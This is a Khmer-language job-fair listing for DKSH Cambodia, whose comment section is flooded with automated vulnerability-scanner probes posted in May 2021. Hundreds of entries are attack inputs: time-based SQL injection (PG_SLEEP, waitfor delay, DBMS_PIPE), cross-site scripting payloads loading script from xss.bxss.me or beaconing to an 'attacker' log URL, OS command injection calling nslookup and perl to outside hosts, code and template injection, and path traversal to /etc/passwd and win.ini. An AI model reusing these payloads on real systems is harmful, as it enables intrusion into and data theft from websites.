ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ឌី ខេ អេស អេច (ខេមបូឌា)
DKSH គឺជាក្រុមហ៊ុនផ្តល់សេវាកម្មពង្រីកទីផ្សារ ឈានមុខគេ ដោយផ្តោតសំខាន់ក្នុងតំបន់អាស៊ី។ ជាក្រុមហ៊ុនដែលជួយ និង បង្កើតម៉ាកយីហោជូនដល់ក្រុមហ៊ុនដទៃទៀត ក្នុងការពង្រីកអាជីវកម្ម ផ្នែកគ្រឿងឧបភោគបរិភោគ ថែរក្សាសុខភាព វត្ថុធាតុដើម និងផ្នែកគ្រឿងចក្រ។ លេខទំនាក់ទំនងដាក់ពាក្យ(Telegram)៖ 0313330280​ / 0313339349 0313330752។​ អ្នកគ្មានCVអាចដាក់ពាក្យតាមLinkនេះបាន៖​​ bit.ly/3lnDzTS

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 56

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 36 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 07:54:56


  @@vfj0t


 • pHqghUme

  2021-05-06 07:54:51


  1'"


 • pHqghUme

  2021-05-06 07:54:49


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 07:54:24


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 07:53:59


  SwbvzY4m')) OR 404=(SELECT 404 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:53:34


  92WhvF9G') OR 718=(SELECT 718 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:53:09


  eYXV4jJx' OR 579=(SELECT 579 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:52:51


  -1)) OR 188=(SELECT 188 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:52:35


  -5) OR 758=(SELECT 758 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:52:22


  -5 OR 581=(SELECT 581 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 07:52:05


  qP817xxr'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:51:50


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:51:34


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:51:17


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 07:51:01


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 07:50:45


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 07:50:26


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 07:50:07


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 07:49:50


  -1" OR 2+626-626-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:49:49


  -1' OR 2+64-64-1=0+0+0+1 or '3EV6iVx5'='


 • pHqghUme

  2021-05-06 07:49:48


  -1 OR 2+546-546-1=0+0+0+1


 • pHqghUme

  2021-05-06 07:49:48


  -1' OR 2+367-367-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:49:47


  -1 OR 2+574-574-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 07:49:44


  xD9GvGlX


 • pHqghUme

  2021-05-06 07:49:25


  1


 • pHqghUme

  2021-05-06 07:48:53


  1


 • @@hcYUR

  2021-05-06 07:48:30


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 07:48:25


  1


 • 1'"

  2021-05-06 07:48:25


  1


 • PlyTYOYE')) OR 667=(SELECT 667 FROM PG_SLEEP(15))--

  2021-05-06 07:48:03


  1


 • v9m2J9LD') OR 914=(SELECT 914 FROM PG_SLEEP(15))--

  2021-05-06 07:47:34


  1


 • 8i3oI1LL' OR 808=(SELECT 808 FROM PG_SLEEP(15))--

  2021-05-06 07:46:37


  1


 • cshEC0US'; waitfor delay '0:0:15' --

  2021-05-06 07:46:07


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 07:45:31


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 07:45:04


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 07:44:41


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 07:44:17


  1


 • pHqghUme

  2021-05-06 07:44:10


  1<XicOqt<


 • pHqghUme

  2021-05-06 07:44:02


  1<img sRc='http://attacker-9317/log.php?


 • pHqghUme

  2021-05-06 07:43:55


  1<A2FW5S x=9764>


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 07:43:54


  1


 • pHqghUme

  2021-05-06 07:43:48


  1<ifRAme sRc=9695.com></IfRamE>


 • pHqghUme

  2021-05-06 07:43:39


  1<WI3YZ9>92YIB[!+!]</WI3YZ9>


 • -1" OR 2+198-198-1=0+0+0+1 --

  2021-05-06 07:43:32


  1


 • -1' OR 2+433-433-1=0+0+0+1 or '3HMzh9xu'='

  2021-05-06 07:43:31


  1


 • pHqghUme

  2021-05-06 07:43:31


  1ENnIP <ScRiPt >g47P(9642)</ScRiPt>


 • -1' OR 2+695-695-1=0+0+0+1 --

  2021-05-06 07:43:30


  1


 • -1 OR 2+224-224-1=0+0+0+1

  2021-05-06 07:43:28


  1


 • -1 OR 2+675-675-1=0+0+0+1 --

  2021-05-06 07:43:27


  1


 • bY7aVeIj

  2021-05-06 07:43:25


  1


 • pHqghUme

  2021-05-06 07:43:25


  1<% contenteditable onresize=g47P(9615)>


 • pHqghUme

  2021-05-06 07:43:18


  1}body{acu:Expre/**/SSion(g47P(9443))}


 • pHqghUme

  2021-05-06 07:43:13


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:43:06


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:43:01


  1


 • pHqghUme

  2021-05-06 07:42:59


  1<input autofocus onfocus=g47P(9682)>


 • pHqghUme

  2021-05-06 07:42:53


  1&lt;ScRiPt&gt;g47P(9487)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:42:46


  1\u003CScRiPt\g47P(9545)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:42:40


  %31%3C%53%63%52%69%50%74%20%3E%67%34%37%50%289061%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:42:38


  1


 • pHqghUme

  2021-05-06 07:42:33


  1<img/src=">" onerror=alert(9218)>


 • pHqghUme

  2021-05-06 07:42:27


  1<img src=xyz OnErRor=g47P(9585)>


 • pHqghUme

  2021-05-06 07:42:18


  1<img src=//xss.bxss.me/t/dot.gif onload=g47P(9141)>


 • pHqghUme

  2021-05-06 07:42:12


  1<body onload=g47P(9289)>


 • pHqghUme

  2021-05-06 07:42:11


  1


 • pHqghUme

  2021-05-06 07:42:07


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9887'>


 • pHqghUme

  2021-05-06 07:42:07


  1


 • pHqghUme

  2021-05-06 07:42:06


  1


 • pHqghUme

  2021-05-06 07:42:01


  1<isindex type=image src=1 onerror=g47P(9569)>


 • pHqghUme

  2021-05-06 07:41:54


  1<ScRiPt >g47P(9001)</ScRiPt>


 • pHqghUme

  2021-05-06 07:41:48


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9756></ScRiPt>


 • pHqghUme

  2021-05-06 07:41:42


  1<ScRiPt >g47P(9577)</ScRiPt>


 • pHqghUme

  2021-05-06 07:41:37


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%67%34%37%50%28%39%36%36%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:41:37


  1


 • pHqghUme

  2021-05-06 07:41:29


  1<script>g47P(9105)</script>


 • pHqghUme

  2021-05-06 07:41:23


  1<WOOWSK>YO3G1[!+!]</WOOWSK>


 • pHqghUme

  2021-05-06 07:41:16


  1<ScRiPt >g47P(9230)</ScRiPt>


 • pHqghUme

  2021-05-06 07:41:11


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:41:07


  1


 • pHqghUme

  2021-05-06 07:41:04


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:40:58


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:40:52


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:40:44


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:40:38


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:40:33


  1


 • pHqghUme

  2021-05-06 07:40:32


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:40:24


  acux5761%C0%BEz1%C0%BCz2a%90bcxuca5761


 • pHqghUme

  2021-05-06 07:40:18


  acu10937%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10937


 • pHqghUme

  2021-05-06 07:40:11


  19044937


 • pHqghUme

  2021-05-06 07:40:07


  '"()&%<acx><ScRiPt >g47P(9422)</ScRiPt>


 • pHqghUme

  2021-05-06 07:40:03


  1'"()&%<acx><ScRiPt >g47P(9184)</ScRiPt>


 • pHqghUme<SRFD2j<

  2021-05-06 07:39:59


  1


 • pHqghUme<img sRc='http://attacker-9073/log.php?

  2021-05-06 07:39:54


  1


 • pHqghUme<bVgj46 x=9846>

  2021-05-06 07:39:51


  1


 • pHqghUme<ifRAme sRc=9732.com></IfRamE>

  2021-05-06 07:39:46


  1


 • pHqghUme<WBZG4F>JZUFU[!+!]</WBZG4F>

  2021-05-06 07:39:40


  1


 • pHqghUmeOfsbO <ScRiPt >g47P(9402)</ScRiPt>

  2021-05-06 07:39:34


  1


 • pHqghUme

  2021-05-06 07:39:34


  1


 • pHqghUme<% contenteditable onresize=g47P(9242)>

  2021-05-06 07:39:29


  1


 • pHqghUme}body{acu:Expre/**/SSion(g47P(9141))}

  2021-05-06 07:39:24


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:39:18


  1


 • pHqghUme

  2021-05-06 07:39:14


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:39:13


  1


 • pHqghUme<input autofocus onfocus=g47P(9815)>

  2021-05-06 07:39:10


  1


 • pHqghUme&lt;ScRiPt&gt;g47P(9805)&lt;/sCripT&gt;

  2021-05-06 07:38:54


  1


 • pHqghUme

  2021-05-06 07:38:52


  1


 • pHqghUme\u003CScRiPt\g47P(9642)\u003C/sCripT\u003E

  2021-05-06 07:38:50


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%67%34%37%50%289806%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:38:45


  1


 • pHqghUme<img/src=">" onerror=alert(9523)>

  2021-05-06 07:38:40


  1


 • pHqghUme<img src=xyz OnErRor=g47P(9499)>

  2021-05-06 07:38:34


  1


 • pHqghUme

  2021-05-06 07:38:30


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=g47P(9900)>

  2021-05-06 07:38:29


  1


 • pHqghUme<body onload=g47P(9544)>

  2021-05-06 07:38:24


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9815'>

  2021-05-06 07:38:17


  1


 • pHqghUme<isindex type=image src=1 onerror=g47P(9052)>

  2021-05-06 07:38:11


  1


 • pHqghUme

  2021-05-06 07:38:06


  1


 • pHqghUme<ScRiPt >g47P(9629)</ScRiPt>

  2021-05-06 07:38:02


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9341></ScRiPt>

  2021-05-06 07:37:57


  1


 • pHqghUme<ScRiPt >g47P(9093)</ScRiPt>

  2021-05-06 07:37:52


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%67%34%37%50%28%39%34%33%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:37:42


  1


 • pHqghUme

  2021-05-06 07:37:39


  1


 • pHqghUme<script>g47P(9623)</script>

  2021-05-06 07:37:36


  1


 • pHqghUme<WDFG9C>0ABTE[!+!]</WDFG9C>

  2021-05-06 07:37:29


  1


 • pHqghUme<ScRiPt >g47P(9456)</ScRiPt>

  2021-05-06 07:37:20


  1


 • pHqghUme

  2021-05-06 07:37:18


  1


 • pHqghUme

  2021-05-06 07:37:15


  1


 • pHqghUme

  2021-05-06 07:37:14


  1


 • pHqghUme

  2021-05-06 07:37:13


  1


 • pHqghUme

  2021-05-06 07:37:12


  1


 • pHqghUme

  2021-05-06 07:37:11


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:37:09


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:37:01


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:36:56


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:36:52


  1


 • pHqghUme

  2021-05-06 07:36:50


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:36:46


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:36:42


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:36:37


  1


 • pHqghUme

  2021-05-06 07:36:35


  1


 • acux5856%C0%BEz1%C0%BCz2a%90bcxuca5856

  2021-05-06 07:36:32


  1


 • acu1667%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1667

  2021-05-06 07:36:26


  1


 • pHqghUme9259169

  2021-05-06 07:36:17


  1


 • pHqghUme

  2021-05-06 07:36:12


  1


 • '"()&%<acx><ScRiPt >g47P(9119)</ScRiPt>

  2021-05-06 07:36:09


  1


 • pHqghUme

  2021-05-06 07:36:04


  1


 • pHqghUme

  2021-05-06 07:36:02


  1


 • pHqghUme'"()&%<acx><ScRiPt >g47P(9639)</ScRiPt>

  2021-05-06 07:36:01


  1


 • pHqghUme

  2021-05-06 07:35:50


  1


 • pHqghUme

  2021-05-06 07:35:37


  1


 • pHqghUme

  2021-05-06 07:35:28


  1


 • pHqghUme

  2021-05-06 07:35:19


  1


 • pHqghUme

  2021-05-06 07:35:18


  1


 • pHqghUme

  2021-05-06 07:35:14


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:35:11


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:35:07


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:35:07


  1


 • pHqghUme

  2021-05-06 07:35:06


  `(nslookup hitgfhxmprjpv6ceee.bxss.me||perl -e "gethostbyname('hitgfhxmprjpv6ceee.bxss.me')")`


 • pHqghUme

  2021-05-06 07:35:04


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:35:02


  |(nslookup hitpzntmmqmpi25974.bxss.me||perl -e "gethostbyname('hitpzntmmqmpi25974.bxss.me')")


 • pHqghUme

  2021-05-06 07:34:59


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:34:55


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 07:34:54


  1


 • pHqghUme

  2021-05-06 07:34:51


  $(nslookup hitoemicrmakab67c2.bxss.me||perl -e "gethostbyname('hitoemicrmakab67c2.bxss.me')")


 • '.print(md5(31337)).'

  2021-05-06 07:34:51


  1


 • pHqghUme

  2021-05-06 07:34:47


  (nslookup hitwxhahsdowl1d76f.bxss.me||perl -e "gethostbyname('hitwxhahsdowl1d76f.bxss.me')")


 • ${@print(md5(31337))}\

  2021-05-06 07:34:46


  1


 • ${@print(md5(31337))}

  2021-05-06 07:34:42


  1


 • pHqghUme

  2021-05-06 07:34:42


  |echo utpfqw$()\ hlycyo\nz^xyu||a #' |echo utpfqw$()\ hlycyo\nz^xyu||a #|" |echo utpfqw$()\ hlycyo\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:34:39


  <!--


 • ";print(md5(31337));$a="

  2021-05-06 07:34:38


  1


 • pHqghUme

  2021-05-06 07:34:38


  &echo ukrhlg$()\ etejls\nz^xyu||a #' &echo ukrhlg$()\ etejls\nz^xyu||a #|" &echo ukrhlg$()\ etejls\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:34:35


  '"


 • pHqghUme

  2021-05-06 07:34:34


  echo woqiwx$()\ pyiulg\nz^xyu||a #' &echo woqiwx$()\ pyiulg\nz^xyu||a #|" &echo woqiwx$()\ pyiulg\nz^xyu||a #


 • ';print(md5(31337));$a='

  2021-05-06 07:34:34


  1


 • <!--

  2021-05-06 07:34:32


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:34:30


  1


 • '"

  2021-05-06 07:34:28


  1


 • pHqghUme

  2021-05-06 07:34:26


  1


 • pHqghUme

  2021-05-06 07:34:24


  1


 • `(nslookup hitoiaxazviswdb573.bxss.me||perl -e "gethostbyname('hitoiaxazviswdb573.bxss.me')")`

  2021-05-06 07:34:22


  1


 • pHqghUme

  2021-05-06 07:34:21


  1


 • pHqghUme

  2021-05-06 07:34:19


  1


 • pHqghUme

  2021-05-06 07:34:18


  1


 • |(nslookup hitcyjsvcyaai7e6eb.bxss.me||perl -e "gethostbyname('hitcyjsvcyaai7e6eb.bxss.me')")

  2021-05-06 07:34:18


  1


 • pHqghUme

  2021-05-06 07:34:17


  1


 • pHqghUme

  2021-05-06 07:34:16


  '"()


 • pHqghUme

  2021-05-06 07:34:16


  1


 • pHqghUme

  2021-05-06 07:34:14


  1


 • pHqghUme

  2021-05-06 07:34:14


  1


 • pHqghUme

  2021-05-06 07:34:12


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 07:34:12


  1


 • /xfs.bxss.me

  2021-05-06 07:34:10


  1


 • pHqghUme

  2021-05-06 07:34:10


  1


 • pHqghUme

  2021-05-06 07:34:09


  1


 • pHqghUme

  2021-05-06 07:34:09


  1


 • pHqghUme

  2021-05-06 07:34:09


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 07:34:09


  '+'A'.concat(70-3).concat(22*4).concat(117).concat(81).concat(108).concat(70)+(require'socket' Socket.gethostbyname('hithk'+'ihtbcjth613b6.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 07:34:07


  1


 • pHqghUme

  2021-05-06 07:34:07


  1


 • pHqghUme

  2021-05-06 07:34:07


  "+"A".concat(70-3).concat(22*4).concat(118).concat(70).concat(105).concat(78)+(require"socket" Socket.gethostbyname("hitze"+"ysqwnbsq3594a.bxss.me.")[3].to_s)+"


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:34:07


  1


 • pHqghUme

  2021-05-06 07:34:06


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:34:06


  1


 • '+'A'.concat(70-3).concat(22*4).concat(120).concat(80).concat(109).concat(66)+(require'socket' Socket.gethostbyname('hitrg'+'ttnagrdd76851.bxss.me.')[3].to_s)+'

  2021-05-06 07:34:06


  1


 • pHqghUme

  2021-05-06 07:34:06


  1


 • pHqghUme

  2021-05-06 07:34:05


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:34:05


  1


 • "+"A".concat(70-3).concat(22*4).concat(101).concat(78).concat(107).concat(68)+(require"socket" Socket.gethostbyname("hitmm"+"jlfskolv30b24.bxss.me.")[3].to_s)+"

  2021-05-06 07:34:05


  1


 • pHqghUme

  2021-05-06 07:34:05


  1


 • pHqghUme

  2021-05-06 07:34:04


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 07:34:04


  1


 • pHqghUme

  2021-05-06 07:34:04


  1


 • pHqghUme

  2021-05-06 07:34:03


  ".gethostbyname(lc("hithr"."jfnasohb06501.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(80).chr(113).chr(82)."


 • pHqghUme

  2021-05-06 07:34:03


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:34:03


  1


 • pHqghUme

  2021-05-06 07:34:03


  1


 • pHqghUme

  2021-05-06 07:34:02


  '.gethostbyname(lc('hitvi'.'mzyysuve2c00b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(73).chr(102).chr(71).'


 • pHqghUme

  2021-05-06 07:34:02


  1


 • pHqghUme

  2021-05-06 07:34:02


  1


 • pHqghUme

  2021-05-06 07:34:01


  1


 • pHqghUme

  2021-05-06 07:34:01


  1


 • pHqghUme

  2021-05-06 07:34:00


  1


 • pHqghUme

  2021-05-06 07:34:00


  1


 • ".gethostbyname(lc("hitgt"."iltmufrmeba73.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(90).chr(106).chr(77)."

  2021-05-06 07:34:00


  1


 • pHqghUme

  2021-05-06 07:33:59


  1


 • '.gethostbyname(lc('hitns'.'vsgblrlwdf1af.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(77).chr(111).chr(87).'

  2021-05-06 07:33:59


  1


 • pHqghUme

  2021-05-06 07:33:58


  1


 • $(nslookup hithujtrsqlnr9af59.bxss.me||perl -e "gethostbyname('hithujtrsqlnr9af59.bxss.me')")

  2021-05-06 07:33:57


  1


 • pHqghUme

  2021-05-06 07:33:56


  1


 • (nslookup hittueaoaijsja148a.bxss.me||perl -e "gethostbyname('hittueaoaijsja148a.bxss.me')")

  2021-05-06 07:33:56


  1


 • pHqghUme

  2021-05-06 07:33:55


  bxss.me


 • pHqghUme

  2021-05-06 07:33:55


  1


 • |echo wifryf$()\ shlumw\nz^xyu||a #' |echo wifryf$()\ shlumw\nz^xyu||a #|" |echo wifryf$()\ shlumw\nz^xyu||a #

  2021-05-06 07:33:55


  1


 • pHqghUme

  2021-05-06 07:33:54


  1


 • &echo dqyfvd$()\ leuqqd\nz^xyu||a #' &echo dqyfvd$()\ leuqqd\nz^xyu||a #|" &echo dqyfvd$()\ leuqqd\nz^xyu||a #

  2021-05-06 07:33:54


  1


 • '"()

  2021-05-06 07:33:54


  1


 • echo bjbaop$()\ gwuiul\nz^xyu||a #' &echo bjbaop$()\ gwuiul\nz^xyu||a #|" &echo bjbaop$()\ gwuiul\nz^xyu||a #

  2021-05-06 07:33:53


  1


 • pHqghUme

  2021-05-06 07:33:53


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:33:52


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 07:33:52


  1&n913988=v970872


 • pHqghUme

  2021-05-06 07:33:51


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 07:33:51


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 07:33:51


  ^(#$!@#$)(()))******


 • bxss.me

  2021-05-06 07:33:50


  1


 • pHqghUme

  2021-05-06 07:33:50


  )


 • pHqghUme

  2021-05-06 07:33:50


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 07:33:49


  1


 • pHqghUme

  2021-05-06 07:33:49


  1


 • ^(#$!@#$)(()))******

  2021-05-06 07:33:49


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:33:49


  1


 • )

  2021-05-06 07:33:48


  1


 • pHqghUme

  2021-05-06 07:33:48


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:33:48


  1


 • !(()&&!|*|*|

  2021-05-06 07:33:48


  1


 • pHqghUme

  2021-05-06 07:33:47


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:33:47


  1


 • pHqghUme&n921607=v958230

  2021-05-06 07:33:47


  1


 • pHqghUme

  2021-05-06 07:33:46


  1


 • pHqghUme

  2021-05-06 07:33:46


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:33:46


  1


 • pHqghUme

  2021-05-06 07:33:45


  1


 • pHqghUme

  2021-05-06 07:33:45


  1


 • pHqghUme

  2021-05-06 07:33:45


  1


 • pHqghUme

  2021-05-06 07:33:45


  1


 • pHqghUme

  2021-05-06 07:33:44


  1


 • pHqghUme

  2021-05-06 07:33:44


  1


 • pHqghUme

  2021-05-06 07:33:43


  1


 • pHqghUme

  2021-05-06 07:33:43


  1


 • pHqghUme

  2021-05-06 07:33:43


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 07:33:43


  1


 • pHqghUme

  2021-05-06 07:33:42


  1


 • pHqghUme

  2021-05-06 07:33:42


  1


 • pHqghUme

  2021-05-06 07:33:41


  1


 • pHqghUme

  2021-05-06 07:33:41


  1


 • pHqghUme

  2021-05-06 07:33:40


  1


 • pHqghUme

  2021-05-06 07:33:40


  1


 • pHqghUme

  2021-05-06 07:33:39


  1


 • pHqghUme

  2021-05-06 07:33:39


  1


 • pHqghUme

  2021-05-06 07:33:38


  1


 • pHqghUme

  2021-05-06 07:33:38


  1


 • pHqghUme

  2021-05-06 07:33:37


  ../1


 • pHqghUme

  2021-05-06 07:33:37


  1


 • pHqghUme

  2021-05-06 07:33:37


  1


 • pHqghUme

  2021-05-06 07:33:35


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:33:35


  1


 • pHqghUme

  2021-05-06 07:33:34


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 07:33:34


  1


 • ../pHqghUme

  2021-05-06 07:33:33


  1


 • pHqghUme

  2021-05-06 07:33:33


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:33:33


  1


 • pHqghUme

  2021-05-06 07:33:32


  1


 • TnNRTWhyTm4=

  2021-05-06 07:33:32


  1


 • pHqghUme

  2021-05-06 07:33:32


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:33:31


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:33:30


  1


 • pHqghUme

  2021-05-06 07:33:29


  1


 • pHqghUme

  2021-05-06 07:33:29


  ${10000233+9999604}


 • ${10000099+9999718}

  2021-05-06 07:33:28


  1


 • pHqghUme

  2021-05-06 07:33:28


  1


 • pHqghUme

  2021-05-06 07:33:27


  1


 • pHqghUme

  2021-05-06 07:33:27


  1


 • pHqghUme

  2021-05-06 07:33:26


  1


 • pHqghUme

  2021-05-06 07:33:26


  1


 • pHqghUme

  2021-05-06 07:33:26


  1


 • pHqghUme

  2021-05-06 07:33:25


  1


 • pHqghUme

  2021-05-06 07:33:25


  1


 • pHqghUme

  2021-05-06 07:33:24


  1


 • pHqghUme

  2021-05-06 07:33:24


  "+response.write(9136171*9424918)+"


 • pHqghUme

  2021-05-06 07:33:24


  1


 • pHqghUme

  2021-05-06 07:33:23


  1


 • pHqghUme

  2021-05-06 07:33:23


  '+response.write(9136171*9424918)+'


 • pHqghUme

  2021-05-06 07:33:23


  1


 • pHqghUme

  2021-05-06 07:33:22


  1


 • pHqghUme

  2021-05-06 07:33:21


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:33:21


  response.write(9136171*9424918)


 • pHqghUme

  2021-05-06 07:33:20


  1


 • pHqghUme

  2021-05-06 07:33:20


  1


 • "+response.write(9365195*9073182)+"

  2021-05-06 07:33:19


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:33:19


  1


 • '+response.write(9365195*9073182)+'

  2021-05-06 07:33:18


  1


 • pHqghUme

  2021-05-06 07:33:18


  1


 • pHqghUme

  2021-05-06 07:33:17


  1


 • pHqghUme

  2021-05-06 07:33:17


  1


 • response.write(9365195*9073182)

  2021-05-06 07:33:17


  1


 • pHqghUme

  2021-05-06 07:33:17


  1


 • pHqghUme

  2021-05-06 07:33:17


  1


 • pHqghUme

  2021-05-06 07:33:16


  1


 • pHqghUme

  2021-05-06 07:33:15


  1


 • pHqghUme

  2021-05-06 07:33:13


  1


 • pHqghUme

  2021-05-06 07:33:13


  1


 • pHqghUme

  2021-05-06 07:33:12


  1


 • pHqghUme

  2021-05-06 07:33:11


  1


 • pHqghUme

  2021-05-06 07:33:10


  1


 • pHqghUme

  2021-05-06 07:33:09


  1


 • pHqghUme

  2021-05-06 07:33:08


  8brQrHfI


 • CM60Jrkb

  2021-05-06 07:33:06


  1


 • pHqghUme

  2021-05-06 07:33:05


  1


 • pHqghUme

  2021-05-06 07:33:04


  1


 • pHqghUme

  2021-05-06 07:32:51


  1


 • pHqghUme

  2021-05-06 07:32:30


  1


 • pHqghUme

  2021-05-06 07:32:08


  1


 • pHqghUme

  2021-05-06 07:31:52


  1


 • pHqghUme

  2021-05-06 07:31:32


  1


 • pHqghUme

